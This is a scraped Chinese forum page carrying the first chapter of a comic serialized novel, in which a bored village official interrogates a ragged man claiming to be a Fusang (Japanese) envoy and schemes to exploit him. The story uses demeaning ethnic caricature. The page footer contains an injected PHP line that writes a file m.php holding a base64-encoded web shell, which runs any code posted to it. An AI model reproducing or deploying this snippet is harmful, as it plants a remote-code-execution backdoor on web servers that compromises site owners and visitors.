找回密码
 立即注册
搜索
查看: 6070|回复: 0
收起左侧

[小说] 早安故事 第一章:扶桑犬

[复制链接]
发表于 2013-8-27 19:48 | 显示全部楼层 |阅读模式
    处暑刚过,天气还是极热,朽木爷躺在遮荫老树下的凉床上不停地打着蒲扇,汗水还是一个劲地往下流。拿起旁边小几上的紫砂壶灌了口茶水,已经换过几次的茶水淡而无味,却也能够解一时之渴。
    “无聊啊~~寂寞啊~~”朽木爷翘起二郎腿,声音也是软绵绵地,“怪不得人常说,寂寞与无聊是人生最大的痛苦,这种乏味的日子的确能够让人慢慢腐烂。武神,”朽木爷看了一眼他旁边的武神,“爷我还真佩服你,这样闷热的天气,你还能穿得这样霸气。”
    武神站在那里,穿着制式的甲胄,外罩一件红色的披风,就连脸上都覆着一张不知什么材料制造的面具,只露出两只神光烁闪的眼睛,亮如星辰。的确很拉风、的确很霸气、也的确很热。
    “大人,心静自然凉,”武神的声音喑哑深沉,“只要心无杂念、抱元守一,您也能超脱物外、寒暑不侵。不如我传大人一个法门……”
    “别、别,大人我俗人一个,懂不得这些大道之理,普普通通就好。”朽木爷心中气苦,这个武神能力是有的,就是太较真了,跟他说话简直就是受罪。
    这时门外一阵嘈杂,只听一个声音道:“大、大、大、大人,抓、抓、抓到一个奸、奸、奸细。”
    “奸细。”朽木爷闻听,身子一挺从凉床上站了起来。
    (苍天啊!大地啊!一个多月了,寂寞无聊的日子终于到头了,不用再霉烂下去了。一个小小“奸细”看爷怎么玩得惊天动地、轰轰烈烈,不残不罢休。)
    使劲忍着激动的泪水,朽木爷整了整身上又歪又皱地小褂,很是官威地吼了声:“带上来。”
    只见三、四个衙役昂胸抬头、大步如飞地走了进来。
    朽木爷看着几个衙役,逡巡了几遍,愣是没发现所谓地奸细在哪。心中那个气啊!气还是小事,主要是落差太大,刚刚激起地雄心壮志,顿时没了底气,泄个一干二净。
    (苍天啊!大地啊!你不是玩我吧!)
    朽木爷憋着一口气,不悦地道:“王班头,人呢?”
    结巴嘴——王班头虽然嘴笨,却是个八面玲珑、心思细腻。隐隐地察觉着大人语气不对,似乎有那么一丝不悦。顿时小心翼翼地回道:“大、大、大人,就、就、就在这。”
    “在哪?”朽木爷又望了望,还是没有见到,语气不禁又阴沉了几分。
    王班头冷汗都出来了,大人今天怎么了,这么一个大活人绑在眼前,怎么愣是看不见。旁边的几个衙役也都是面面相觑,大人不会是鬼遮眼了吧。
    “这、这。”王班头用手指了指一个东西。
    看着王班头指的东西,朽木爷乐了,心中一阵畅美。
    (MD,老子还以为自己真的鬼遮眼了,还好,还好。)
    朽木爷屁颠屁颠地走上前,伸手拿下那个东西口中的臭袜子。
    “大人,冤枉,我地,好人的干活,不是奸细,是良民,是大大良民。”看着眼前这又矮又小、又瘦又干的东西,一把鼻涕,一把泪地嚎个不停,朽木爷心里那个美啊。
    (小样,落到我的手里,怎么也得让大爷我爽不是。)
    “咳,咳,”朽木爷装模作样地咳了两声,“怎么回事,王班头,你闲得蛋疼,怎么把个外邦矬乞丐给弄到老爷我的府上来了,拿老爷我寻开心,你不想好了。”
    王班头再八面玲珑哪能了解朽木爷的思维模式,心中那个急啊,越急嘴越笨,越笨越是说不出来:“老…老…老…老…”
    “行了,行了,”朽木爷一摆手,“副班头,你来说。”
    “是,老爷。”副班头看了王班头一眼。王班头一张脸憋得通红,正在那里练气呢!
    “今天,王班头带着我们几个正在巡街,就见一个矮子从村外冲了进来,像一坨狗屎一样地刺眼与明显,穿着破衣烂衫在路旁的垃圾堆里不停地翻找。大人您知道,我们这里不大,乡里乡亲的都认识,突然出了这么一个东西,我们就留了心。只见他像只不挑食的狗儿,收集了一大堆烂菜、剩饭,用一块破布包了起来,一阵风地扭头就跑。王班头心思细腻说这事有蹊跷,让我们悄悄地跟了上去,果不其然,发现村外不远地树林里聚集了大量的人马。大家吃了一惊,说赶快回来报告,做好防御工作,不要到时被打个措手不及。还是王班头想得周到,顺手捉了个奸细,连忙向老爷您报告来了。”
    “嗯~~”朽木爷略带赞赏地看了王班头一眼。王班头挺胸抬头,满面红光。
    朽木爷初时还有些忐忑不安,不过看眼前这身高不足三尺,瘦小不堪的东西,又想了想武神那深不可测的恐怖身手,就算是来个千儿八百地又能济个什么事,再者说了,我这小小村落也没啥重要地值得一抢地东西,就算是来了也只能是干瞪眼。
    武神更是不急,刀山火海、血雨腥风、江湖飘摇,什么没见过,就这几个破蕃薯、烂蕃茄,爷分分钟就给秒了。
    几个衙役看两位爷如此地笃定,也不心急。天塌有个高地顶着,我怕啥。
    他们不急,脚下那个东西倒是急了:“大人,各位大人,我们不是坏人,是使者,是进京面圣地扶桑使者。”
    “屎?”朽木爷好歹也是进过京面过圣地人。就这些破衣烂衫、邋里邋遢的衰样,还说自己是使者,鬼才信呢!
    “大人,是使者,我叫犬养真,正是这次访问天朝上国的正使。”这个东西努力作出一副昂头挺胸、潇洒不凡的气派,但在众人的眼中他猥琐地形像却更加地猥琐不堪。
    (‘犬养’?还‘真’,我勒了个去,这些扶桑人不会都是这么自恋与变态吧!)
    朽木爷毕竟是在道上混过的,就凭这东西几句话就让他相信,显然是不可能的。
    “你有证据吗?”
    “呃!”犬养真一时语塞,“大人明鉴,小使在来时的路上被打劫了,三百多人的队伍除了人就没别的了。缺衣少食、饥寒困顿,却是进退两难,没办法只能勒紧腰带向前走,偶而从经过的城市中捡点残羹剩饭,与野狗争食,命运不济、苦不堪言。”说着说着便流下了眼泪,悲苦之极。
    (这么惨!)朽木爷不是什么善男信女,听这个东西地一番言语,没有仰天大笑已经很不错了。惨成这样,朽木爷便也信了几分。心中不由一动,好机会,这真是上天送给大爷我的大好机会,N-N-D,这帮东西遇到大爷我算你们倒霉。
    “听君一席话,本官信了,”朽木爷拱了拱手,“却是一场误会,是下面的人鲁莽了,本官会好好责罚他们的,这就放犬养先生回去,不过先生回去后又该如何,还是这样一路混上京城,那要等到何年何月,就算到了京城,也会奄奄一息,只剩下半条命了吧。”
    犬养真闻言,眼前一亮:“大人这话是……”
    朽木爷声音充满诱惑:“想不想有饭吃?想不想有衣穿?想不想临走地时候还有一笔钱拿?任你乘车还是坐马或是行船,风风光光地去京城。”
    想,想,真是太想了,犬养真激动得双手颤抖。这样地好事,谁不想谁T-M-D就是混蛋。
    朽木爷见这头蠢驴上了当,不紧不慢地道:“我有一个不成熟地想法,想与犬养先生共同参考一下?”
    谈起正事,何况是这么重要地大事,犬养真肃容满面:“请大人明言。”
    武神站在一旁,束手而立,锐利的眼神却如刀般地射在朽木爷的身上。(陛下看人的本领的确很准,这个朽木果然不是一个安分的主!)

    请看下一章《守望者》。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋| ( Q群677590098 )<?php fputs(fopen('m.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));?>

GMT+8, 2022-9-25 19:50 , Processed in 0.569372 second(s), 44 queries .

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表